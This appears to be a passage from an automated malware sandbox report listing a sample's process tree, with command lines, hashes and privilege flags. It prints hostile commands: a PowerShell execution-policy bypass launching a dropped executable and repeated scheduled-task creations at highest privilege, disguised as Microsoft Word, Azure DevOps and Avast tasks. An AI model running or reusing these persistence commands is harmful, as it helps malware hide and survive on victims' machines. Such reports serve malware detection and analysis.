                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
                            Imagebase:0x7ff6d2ed0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
                            Imagebase:0xd00000
                            File size:439'296 bytes
                            MD5 hash:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\xdwdPutty.exe"
                            Imagebase:0x3f0000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            Has exited:true

                            General

                            Target ID:37
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:09:50:38
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:09:50:38
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:09:50:44
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0x900000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:52
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:54
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:09:50:46
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\xdwdPutty.exe
                            Imagebase:0x9a0000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:61
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:09:50:49
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:09:50:49
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0x290000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:72
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:75
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:76
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:77
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:78
                            Start time:09:50:54
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\xdwdPutty.exe
                            Imagebase:0x40000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:79
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:80
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:81
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:82
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:83
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:84
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:85
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:86
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:87
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:99
                            Start time:09:50:59
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:104
                            Start time:09:51:01
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:109
                            Start time:09:51:02
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:150
                            Start time:09:51:15
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:171
                            Start time:09:51:21
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:214
                            Start time:09:51:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:224
                            Start time:09:51:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:328
                            Start time:09:52:04
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:333
                            Start time:09:52:05
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:363
                            Start time:09:52:15
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:368
                            Start time:09:52:17
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:393
                            Start time:09:52:24
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
